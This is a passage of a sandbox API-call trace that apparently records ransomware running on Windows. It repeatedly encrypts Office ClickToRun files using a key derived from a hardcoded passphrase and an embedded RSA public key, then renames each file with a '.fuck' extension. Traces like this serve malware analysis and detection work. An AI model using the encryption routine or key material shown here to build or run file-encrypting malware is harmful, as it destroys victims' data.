dwFileAttributes=0x80) returned 0 [0238.981] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\MasterDescriptor.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\masterdescriptor.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.981] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\MasterDescriptor.x-none.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\masterdescriptor.x-none.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.982] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\MasterDescriptor.x-none.xml.gsg", dwFileAttributes=0x2) returned 0 [0238.982] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x287fb98) returned 1 [0238.985] CryptCreateHash (in: hProv=0x287fb98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0238.985] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0238.985] CryptHashData (hHash=0x2894130, pbData=0x2884e68, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.985] CryptDeriveKey (in: hProv=0x287fb98, Algid=0x6610, hBaseData=0x2894130, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x2893ff0) returned 1 [0238.985] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----6", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.985] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0238.985] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x2882508) returned 1 [0238.985] CryptImportPublicKeyInfo (in: hCryptProv=0x2882508, dwCertEncodingType=0x1, pInfo=0x2896dc0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2896df0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2896df8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x2893c30) returned 1 [0238.986] CryptEncrypt (in: hKey=0x2893c30, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0238.986] CryptEncrypt (in: hKey=0x2893c30, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28826a0*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x28826a0*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0238.986] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28826a0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0238.986] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d204*=0x0, lpOverlapped=0x0) returned 0 [0238.986] CryptEncrypt (in: hKey=0x2893ff0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x10) returned 1 [0238.986] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0238.986] CloseHandle (hObject=0xffffffff) returned 1 [0238.986] CloseHandle (hObject=0xffffffff) returned 1 [0238.986] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\MasterDescriptor.x-none.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\masterdescriptor.x-none.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\MasterDescriptor.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\masterdescriptor.x-none.xml"), bFailIfExists=0) returned 0 [0238.987] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\MasterDescriptor.x-none.xml", dwFileAttributes=0x0) returned 0 [0238.987] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\MasterDescriptor.x-none.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\masterdescriptor.x-none.xml.gsg")) returned 0 [0238.988] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\MasterDescriptor.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\masterdescriptor.x-none.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\MasterDescriptor.x-none.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\masterdescriptor.x-none.xml.fuck")) returned 0 [0238.988] CryptDestroyHash (hHash=0x2894130) returned 1 [0238.988] CryptDestroyKey (hKey=0x2893ff0) returned 1 [0238.988] CryptReleaseContext (hProv=0x287fb98, dwFlags=0x0) returned 1 [0238.988] FindNextFileA (in: hFindFile=0x2893e70, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0238.988] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0238.988] GetLastError () returned 0x5 [0238.989] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\s640.hash" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\s640.hash")) returned 0x20 [0238.989] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\s640.hash", dwFileAttributes=0x80) returned 0 [0238.989] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\s640.hash" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\s640.hash"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.990] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\s640.hash.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\s640.hash.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.990] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\s640.hash.gsg", dwFileAttributes=0x2) returned 0 [0238.990] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x2883938) returned 1 [0238.993] CryptCreateHash (in: hProv=0x2883938, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0238.993] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0238.993] CryptHashData (hHash=0x2893bf0, pbData=0x2884be8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.993] CryptDeriveKey (in: hProv=0x2883938, Algid=0x6610, hBaseData=0x2893bf0, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x2893cb0) returned 1 [0238.993] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----6", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.993] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0238.993] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x2883718) returned 1 [0238.994] CryptImportPublicKeyInfo (in: hCryptProv=0x2883718, dwCertEncodingType=0x1, pInfo=0x28968e0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2896910*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2896918*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x2893a30) returned 1 [0238.994] CryptEncrypt (in: hKey=0x2893a30, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0238.994] CryptEncrypt (in: hKey=0x2893a30, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28838b0*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x28838b0*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0238.994] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28838b0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0238.994] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d204*=0x0, lpOverlapped=0x0) returned 0 [0238.994] CryptEncrypt (in: hKey=0x2893cb0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x10) returned 1 [0238.994] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0238.994] CloseHandle (hObject=0xffffffff) returned 1 [0238.994] CloseHandle (hObject=0xffffffff) returned 1 [0238.995] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\s640.hash.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\s640.hash.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\s640.hash" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\s640.hash"), bFailIfExists=0) returned 0 [0238.995] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\s640.hash", dwFileAttributes=0x0) returned 0 [0238.996] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\s640.hash.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\s640.hash.gsg")) returned 0 [0238.996] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\s640.hash" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\s640.hash"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\s640.hash.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\s640.hash.fuck")) returned 0 [0238.997] CryptDestroyHash (hHash=0x2893bf0) returned 1 [0238.997] CryptDestroyKey (hKey=0x2893cb0) returned 1 [0238.997] CryptReleaseContext (hProv=0x2883938, dwFlags=0x0) returned 1 [0238.997] FindNextFileA (in: hFindFile=0x2893e70, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0238.997] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0238.997] GetLastError () returned 0x5 [0238.997] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\stream.Platform.x-none.man.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\stream.platform.x-none.man.xml")) returned 0x20 [0238.998] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\stream.Platform.x-none.man.xml", dwFileAttributes=0x80) returned 0 [0238.998] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\stream.Platform.x-none.man.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\stream.platform.x-none.man.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.998] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\stream.Platform.x-none.man.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\stream.platform.x-none.man.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.999] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\stream.Platform.x-none.man.xml.gsg", dwFileAttributes=0x2) returned 0 [0238.999] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x287fb98) returned 1 [0239.002] CryptCreateHash (in: hProv=0x287fb98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0239.002] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.002] CryptHashData (hHash=0x2894130, pbData=0x2884e68, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.002] CryptDeriveKey (in: hProv=0x287fb98, Algid=0x6610, hBaseData=0x2894130, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x2893eb0) returned 1 [0239.002] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----6", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.002] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0239.002] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x2882728) returned 1 [0239.003] CryptImportPublicKeyInfo (in: hCryptProv=0x2882728, dwCertEncodingType=0x1, pInfo=0x2895ff0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2896020*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2896028*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x2894170) returned 1 [0239.003] CryptEncrypt (in: hKey=0x2894170, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0239.003] CryptEncrypt (in: hKey=0x2894170, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28830b8*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x28830b8*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0239.003] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28830b8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0239.003] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d204*=0x0, lpOverlapped=0x0) returned 0 [0239.003] CryptEncrypt (in: hKey=0x2893eb0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x10) returned 1 [0239.003] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0239.003] CloseHandle (hObject=0xffffffff) returned 1 [0239.003] CloseHandle (hObject=0xffffffff) returned 1 [0239.003] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\stream.Platform.x-none.man.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\stream.platform.x-none.man.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\stream.Platform.x-none.man.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\stream.platform.x-none.man.xml"), bFailIfExists=0) returned 0 [0239.004] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\stream.Platform.x-none.man.xml", dwFileAttributes=0x0) returned 0 [0239.004] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\stream.Platform.x-none.man.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\stream.platform.x-none.man.xml.gsg")) returned 0 [0239.005] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\stream.Platform.x-none.man.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\stream.platform.x-none.man.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\stream.Platform.x-none.man.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\stream.platform.x-none.man.xml.fuck")) returned 0 [0239.005] CryptDestroyHash (hHash=0x2894130) returned 1 [0239.005] CryptDestroyKey (hKey=0x2893eb0) returned 1 [0239.005] CryptReleaseContext (hProv=0x287fb98, dwFlags=0x0) returned 1 [0239.005] FindNextFileA (in: hFindFile=0x2893e70, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0239.005] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0239.006] GetLastError () returned 0x5 [0239.006] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\stream.x64.x-none.hash" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\stream.x64.x-none.hash")) returned 0x20 [0239.006] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\stream.x64.x-none.hash", dwFileAttributes=0x80) returned 0 [0239.006] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\stream.x64.x-none.hash" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\stream.x64.x-none.hash"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.007] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\stream.x64.x-none.hash.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\x-none.16\\stream.x64.x-none.hash.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.007] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\x-none.16\\stream.x64.x-none.hash.gsg", dwFileAttributes=0x2) returned 0 [0239.008] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x287fb98) returned 1 [0239.010] CryptCreateHash (in: hProv=0x287fb98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0239.010] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.010] CryptHashData (hHash=0x2894130, pbData=0x2884e90, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.010] CryptDeriveKey (in: hProv=0x287fb98, Algid=0x6610, hBaseData=0x2894130, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x2893d30) returned 1 [0239.010] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC 